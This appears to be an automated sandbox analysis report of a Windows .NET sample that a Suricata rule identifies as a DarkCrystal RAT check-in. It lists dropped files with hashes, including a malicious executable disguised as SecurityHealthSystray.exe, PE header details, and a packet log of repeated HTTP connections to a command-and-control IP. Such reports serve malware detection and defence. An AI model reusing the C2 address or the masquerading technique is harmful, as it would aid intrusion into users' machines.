                                                                    C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):1224
                                                                    Entropy (8bit):4.435108676655666
                                                                    Encrypted:false
                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                    Malicious:false
                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4608
                                                                    Entropy (8bit):3.940104839968216
                                                                    Encrypted:false
                                                                    SSDEEP:48:68prPtxM7Jt8Bs3FJsdcV4MKe27U0vqBHOOulajfqXSfbNtm:LPwPc+Vx9MU0vkocjRzNt
                                                                    MD5:0E8357362DD8B4854B3DFCEA0DEE9B68
                                                                    SHA1:CDA712D4DC639E50C3013A496E4DBC429E0AFDC2
                                                                    SHA-256:31A956D0BB1A0A9EC2A490D02DCE23C669A38A5AAEE30CDE28447CFFA675024B
                                                                    SHA-512:9DCD71336A6C02603BB93C1A83E6EE0DF611DDE051767B24D88209D59ADC6530DDB4078663EE33C8446B9BD8ECC1907F67D3E4FAD89A9A4B0F35FA939BC263D3
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                    \Device\Null

                                                                    Download File
                                                                    Process:C:\Windows\System32\w32tm.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):151
                                                                    Entropy (8bit):4.873342209459248
                                                                    Encrypted:false
                                                                    SSDEEP:3:VLV993J+miJWEoJ8FXt+ScWncnNvpKH+UaNrv:Vx993DEUYZbH+r
                                                                    MD5:D174EEC8ACAA2D947D98D01D04FD5589
                                                                    SHA1:706AEFB85EB63F7CDD55CDC8E6A3463A388609E2
                                                                    SHA-256:B245484228E673A323A4380C71DC829012A362C0420C5165D947D85092B1AD93
                                                                    SHA-512:BBEF9C205AD17DB165524CD6CE15F684DF187166D60C7EE864A98765AAAD25F144356B26DEAD89D3759B4D42AFCCA0683D6FDB38C2ED68776248D96F589EE212
                                                                    Malicious:false
                                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 21/08/2024 05:57:29..05:57:29, error: 0x80072746.05:57:34, error: 0x800705B4.

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.550221219335871
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:jW5TA1J9Z1.exe
                                                                    File size:1'960'448 bytes
                                                                    MD5:910284d590bdf27bbeedbde3f3a2a94d
                                                                    SHA1:6561ef1e4b2521aaf86f03ab791ac5ed6c4af7d0
                                                                    SHA256:6a397c6e1041ad55295c3fe2cf7f795da853004c1a02e1d77c65f0da86ad312e
                                                                    SHA512:aa66c2dca084fc179756d360f91609a433b2e704cc0e19ae05f25749c8c102edf2808a92c088782643ef3ec75fa91768333820e30c3839247ec815d9bf8a8797
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    TLSH:7195AE16B5924E3AC3645B314197063D92D1DB263512FB0F361F61EAAD0BBF18EA21F3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@................................

                                                                    File Icon

                                                                    Icon Hash:00928e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x5e002e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x66BC7380 [Wed Aug 14 09:06:08 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1dffe00x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e20000x320.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1e40000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x1de0340x1de20094136cb314763d4abd15d185b96fff82False0.7830417687908496data7.553608083833407IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x1e20000x3200x40010a44baa6b63fca2f6945c87c4ae48fbFalse0.3525390625data2.6502033736331296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .reloc0x1e40000xc0x200abe07fcf0624957983744d5d2ad2b8efFalse0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x1e20580x2c8data0.46207865168539325

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                                    2024-08-21T10:03:04.099115+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14970980192.168.2.780.211.144.156

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 21, 2024 10:03:03.359734058 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:03.364623070 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:03.364710093 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:03.365466118 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:03.370285034 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:03.725717068 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:03.730591059 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.058492899 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.099114895 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.154150009 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.154189110 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.154314995 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.188143015 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.193087101 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.323324919 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.328176975 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.329288006 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.329427958 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.335558891 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.402678013 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.402890921 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.408677101 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.677340984 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.682156086 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.682435036 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.682446003 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.699708939 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.749056101 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.753909111 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.958807945 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.959017992 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:04.964025974 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:04.964320898 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.021353006 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.067887068 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.157346010 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.208501101 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.566585064 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.614763021 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.945444107 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.946787119 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.950731039 CEST804970980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.950802088 CEST4970980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.951875925 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.951960087 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.952052116 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.956933022 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.957639933 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:05.962786913 CEST804971280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:05.962833881 CEST4971280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:06.302434921 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:06.307364941 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:06.307378054 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:06.307579041 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:06.659027100 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:06.708508015 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:06.795371056 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.009253979 CEST804971480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.010338068 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:07.101331949 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:07.106457949 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.106535912 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:07.106719971 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:07.111695051 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.458755970 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:07.463818073 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.463844061 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.463860989 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.817440987 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.896028042 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:07.955209970 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:07.996206999 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.545803070 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.546529055 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.551022053 CEST804971880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:08.551096916 CEST4971880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.551562071 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:08.551642895 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.551778078 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.557323933 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:08.828368902 CEST4971480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.896136045 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:08.900949955 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:08.901088953 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:08.901106119 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:09.229041100 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:09.366518974 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:09.366693974 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:10.664494038 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:10.665288925 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:10.669724941 CEST804971980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:10.669789076 CEST4971980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:10.670155048 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:10.670221090 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:10.670357943 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:10.675148010 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:11.021135092 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:11.025959969 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:11.026150942 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:11.345338106 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:11.396171093 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:11.481389999 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:11.583610058 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.081655025 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.082309008 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.086834908 CEST804972480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.086927891 CEST4972480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.087079048 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.087172985 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.087327957 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.092087984 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.443074942 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:14.447942019 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.447952986 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.447962999 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.767332077 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.897525072 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:14.897717953 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:15.802146912 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:15.802825928 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:15.807807922 CEST804972780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:15.807874918 CEST4972780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:15.808403969 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:15.808470964 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:15.808602095 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:15.814249039 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.161849022 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.166795969 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.166819096 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.166827917 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.510523081 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.538531065 CEST4973080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.543486118 CEST804973080.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.543797970 CEST4973080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.543946028 CEST4973080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.548682928 CEST804973080.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.645663023 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.645709038 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.736046076 CEST4973080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.788796902 CEST804973080.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.982930899 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.983488083 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.988290071 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.988363028 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.988464117 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.989442110 CEST804972880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:16.989497900 CEST4972880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:16.993204117 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.031698942 CEST804973080.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.031877995 CEST4973080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:17.333632946 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:17.513827085 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.513837099 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.514086962 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.670511961 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.833072901 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:17.912044048 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:17.989794016 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:18.748851061 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:18.754015923 CEST804973380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:18.754081011 CEST4973380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:18.965841055 CEST4973580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:18.970750093 CEST804973580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:18.970839024 CEST4973580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:18.970951080 CEST4973580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:18.975733995 CEST804973580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:19.318097115 CEST4973580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:19.323086023 CEST804973580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:19.323101997 CEST804973580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:19.323115110 CEST804973580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:19.654755116 CEST804973580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:03:19.724152088 CEST4973580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:03:19.853583097 CEST804973580.211.144.156192.168.2.7
